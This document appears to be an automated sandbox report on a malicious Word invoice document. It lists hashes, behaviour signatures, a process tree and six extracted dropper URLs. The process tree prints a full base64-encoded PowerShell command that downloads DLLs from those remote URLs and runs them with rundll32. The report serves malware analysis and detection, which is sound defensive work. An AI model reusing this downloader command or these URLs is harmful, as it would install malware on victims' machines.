Analysis

  • max time kernel
    110s
  • max time network
    34s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    28-03-2023 14:37

General

  • Target

    E4_INV_pd0622463.doc

  • Size

    206KB

  • MD5

    99a96323e20fc70cef855547068e34ba

  • SHA1

    98d4e8a4dacc02e9a64afbcc638631894f97dfaa

  • SHA256

    e67a24ae89683460405b6f1ecbac115fc549588234ccf8fcc34a174e9b179502

  • SHA512

    5eaa28a4ab909ae3816afc43f68a28891d460ae1db184955b157767e8029f3d34178e8a2721d0e89ed52e79540043fa5ec87773a38e19a3c7e8635f84392521c

  • SSDEEP

    1536:3QBLceqLDr80L1lKugpEWoKtMH1Ky2ccCEIOVFzwquIi0OymgBGvhY61LqB8T6IJ:ABLcXHr80sM7AI0OquZSm5vhYBjIGYD

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://gamaes.shop/wp-content/plugins/sSTToaEwCG5VASw/

exe.dropper

http://newsaarctech.com/wp-content/Sx9tvV5/

exe.dropper

http://www.fizik.tv.tr/ex/mlFHNKb9x/

exe.dropper

https://shopallcars.com/node_modules/dXF0W/

exe.dropper

https://infohybrid.com/assets/Lq5vllPN/

exe.dropper

http://fse.in.ua/layouts/WMIxdId0bHiS/GnfihOVGqjmsWPJg4/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\E4_INV_pd0622463.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1444
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1028
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c c:\programdata\uwdhx.bat
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1840
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -enc JABzAHQAcgBzAD0AIgBoAHQAdABwADoALwAvAGcAYQBtAGEAZQBzAC4AcwBoAG8AcAAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBwAGwAdQBnAGkAbgBzAC8AcwBTAFQAVABvAGEARQB3AEMARwA1AFYAQQBTAHcALwAsAGgAdAB0AHAAOgAvAC8AbgBlAHcAcwBhAGEAcgBjAHQAZQBjAGgALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBTAHgAOQB0AHYAVgA1AC8ALABoAHQAdABwADoALwAvAHcAdwB3AC4AZgBpAHoAaQBrAC4AdAB2AC4AdAByAC8AZQB4AC8AbQBsAEYASABOAEsAYgA5AHgALwAsAGgAdAB0AHAAcwA6AC8ALwBzAGgAbwBwAGEAbABsAGMAYQByAHMALgBjAG8AbQAvAG4AbwBkAGUAXwBtAG8AZAB1AGwAZQBzAC8AZABYAEYAMABXAC8ALABoAHQAdABwAHMAOgAvAC8AaQBuAGYAbwBoAHkAYgByAGkAZAAuAGMAbwBtAC8AYQBzAHMAZQB0AHMALwBMAHEANQB2AGwAbABQAE4ALwAsAGgAdAB0AHAAOgAvAC8AZgBzAGUALgBpAG4ALgB1AGEALwBsAGEAeQBvAHUAdABzAC8AVwBNAEkAeABkAEkAZAAwAGIASABpAFMALwBHAG4AZgBpAGgATwBWAEcAcQBqAG0AcwBXAFAASgBnADQALwAiAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7AGYAbwByAGUAYQBjAGgAKAAkAHMAdAAgAGkAbgAgACQAcwB0AHIAcwApAHsAJAByADEAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAJAByADIAPQBHAGUAdAAtAFIAYQBuAGQAbwBtADsAIAAkAHQAcAB0AGgAPQAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcACIAKwAkAHIAMQArACIALgBkAGwAbAAiADsASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAHIAaQAgACQAcwB0ACAALQBPAHUAdABGAGkAbABlACAAJAB0AHAAdABoADsAaQBmACgAVABlAHMAdAAtAFAAYQB0AGgAIAAkAHQAcAB0AGgAKQB7ACQAZgBwAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAUwB5AHMAVwBvAHcANgA0AFwAcgB1AG4AZABsAGwAMwAyAC4AZQB4AGUAIgA7ACQAYQA9ACQAdABwAHQAaAArACIALABmACIAKwAkAHIAMgA7AFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAkAGYAcAAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAGEAOwBiAHIAZQBhAGsAOwB9AH0A
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1392

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Defense Evasion

    Modify Registry

    1
    T1112

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\uwdhx.bat
      Filesize

      2KB

      MD5

      e5b8975e992ef3e26493d8db3d022ad9

      SHA1

      e514c0757b99b9a81ffe337289adeda62fb4e4c2

      SHA256

      3dfbbf218112c000fa30ad568dd2a0d3884392c4019a61791fbb17405f8e4517

      SHA512

      fed805b656acadae86e59a2c4900ddee528cd2d5b857599760c93f99f79170cd24cee98543a85777a562dade32a6bcc8b0e4d2eed6476ea7f297b0fa932c0a93

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      c94b666cb172cd7500b7a759a694432b

      SHA1

      c023371e15c3f3374bde5a944c0113d12d1f9e70

      SHA256

      6964cc70e9025c8e41df07f202b8a15a15d6cdf448334a4e2e894a71ec02fc3f

      SHA512

      a0d010e22f26d1481296f86db138de0948dfec4dcc0f9f0c9804ada2e9a4aec27ad658782848a46df7c8f74db7d91ca2040f07c5b85ca758789b81ed8a049366

    • C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
      Filesize

      2B

      MD5

      f3b25701fe362ec84616a93a45ce9998

      SHA1

      d62636d8caec13f04e28442a0a6fa1afeb024bbb

      SHA256

      b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

      SHA512

      98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

    • \??\c:\programdata\uwdhx.bat
      Filesize

      2KB

      MD5

      e5b8975e992ef3e26493d8db3d022ad9

      SHA1

      e514c0757b99b9a81ffe337289adeda62fb4e4c2

      SHA256

      3dfbbf218112c000fa30ad568dd2a0d3884392c4019a61791fbb17405f8e4517

      SHA512

      fed805b656acadae86e59a2c4900ddee528cd2d5b857599760c93f99f79170cd24cee98543a85777a562dade32a6bcc8b0e4d2eed6476ea7f297b0fa932c0a93

    • memory/1392-118-0x0000000001F40000-0x0000000001F80000-memory.dmp
      Filesize

      256KB

    • memory/1392-117-0x0000000001F40000-0x0000000001F80000-memory.dmp
      Filesize

      256KB

    • memory/1444-75-0x00000000091D0000-0x00000000092D0000-memory.dmp
      Filesize

      1024KB

    • memory/1444-86-0x00000000062D0000-0x00000000063D0000-memory.dmp
      Filesize

      1024KB

    • memory/1444-80-0x00000000062D0000-0x00000000063D0000-memory.dmp
      Filesize

      1024KB

    • memory/1444-81-0x00000000062D0000-0x00000000063D0000-memory.dmp
      Filesize

      1024KB

    • memory/1444-82-0x00000000062D0000-0x00000000063D0000-memory.dmp
      Filesize

      1024KB

    • memory/1444-84-0x00000000062D0000-0x00000000063D0000-memory.dmp
      Filesize

      1024KB

    • memory/1444-85-0x00000000062D0000-0x00000000063D0000-memory.dmp
      Filesize

      1024KB

    • memory/1444-79-0x00000000062D0000-0x00000000063D0000-memory.dmp
      Filesize

      1024KB

    • memory/1444-83-0x00000000062D0000-0x00000000063D0000-memory.dmp
      Filesize

      1024KB

    • memory/1444-74-0x00000000062D0000-0x00000000063D0000-memory.dmp
      Filesize

      1024KB

    • memory/1444-54-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1444-76-0x00000000062D0000-0x00000000063D0000-memory.dmp
      Filesize

      1024KB

    • memory/1444-116-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/1444-78-0x00000000062D0000-0x00000000063D0000-memory.dmp
      Filesize

      1024KB

    • memory/1444-77-0x00000000062D0000-0x00000000063D0000-memory.dmp
      Filesize

      1024KB